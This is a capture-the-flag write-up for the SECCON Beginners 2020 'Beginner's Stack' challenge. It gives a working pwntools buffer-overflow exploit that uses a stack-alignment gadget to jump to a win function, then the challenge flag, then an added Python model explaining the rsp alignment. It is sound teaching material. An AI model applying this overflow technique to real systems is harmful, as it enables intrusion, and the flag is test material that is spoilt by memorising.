[SECCON Beginners CTF 2020] Beginner's Stack

Let's learn how to abuse stack overflow!

Explanation

This is an ordinary buffer overflow challenge.
Jumping straight to win_addr trips the stack alignment check, so I put a `sub rsp, 0x08 ; add rsp, 0x08 ; ret ;` gadget in between.

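#!python
from pwn import *

# Remote service, started as an `nc` subprocess
target = ('nc bs.quals.beginners.seccon.jp 9001'.split(' '))
# Local challenge binary (not used below)
target_ = 'chall'

io = process(target)
# Read the first line of output and print bytes 48-55 of it
out = io.readline()
print(out[48:56])

win_addr = p64(0x400861)
# Gadget: sub rsp, 0x08 ; add rsp, 0x08 ; ret
ali_rsp_addr = p64(0x00400b44)

# 0x28 bytes of padding up to the saved return address
payload = b'A'*0x28
payload += ali_rsp_addr
payload += win_addr

io.sendlineafter(': ', payload)

io.interactive()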

ctf4b{u_r_st4ck_pwn_b3g1nn3r_tada}
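Why the extra gadget fixes the alignment, as an added example that is not part of the original writeup: it walks the overwritten return addresses and tracks rsp until win is entered, with and without the gadget. The addresses and padding are taken from the script above; the stack address `RET_SLOT` is a constructed value, and the model assumes the saved return address sits at an address that is 8 mod 16, as the System V AMD64 ABI gives for a conforming caller.

```python
import struct

# Values taken from the exploit script on this page.
PAD = 0x28
WIN = 0x400861
ALIGN_GADGET = 0x400B44  # sub rsp, 0x08 ; add rsp, 0x08 ; ret

# Constructed stack address of the saved return address (assumption).
# A `call` made with a 16-byte aligned rsp pushes the return address
# at an address that is 8 mod 16.
RET_SLOT = 0x7FFD_0000_0F18


def build(chain):
    """Padding followed by the little-endian 8-byte return addresses."""
    return b"A" * PAD + b"".join(struct.pack("<Q", a) for a in chain)


def rsp_at_entry(payload, target=WIN, ret_slot=RET_SLOT):
    """Return the value of rsp at the moment `target` starts executing."""
    count = (len(payload) - PAD) // 8
    words = struct.unpack_from("<%dQ" % count, payload, PAD)
    rsp = ret_slot
    for addr in words:
        rsp += 8  # each `ret` pops one 8-byte word into rip
        if addr == target:
            return rsp
        if addr != ALIGN_GADGET:
            raise ValueError("address not modelled: %#x" % addr)
        # Inside the gadget, sub/add cancel out; its final `ret`
        # is the pop performed by the next loop iteration.
    raise ValueError("target never reached")


def abi_aligned(rsp):
    """At function entry the ABI expects rsp + 8 to be a multiple of 16."""
    return (rsp + 8) % 16 == 0


if __name__ == "__main__":
    for name, chain in (("direct", [WIN]), ("with gadget", [ALIGN_GADGET, WIN])):
        rsp = rsp_at_entry(build(chain))
        print("%-12s rsp=%#x aligned=%s" % (name, rsp, abi_aligned(rsp)))
```
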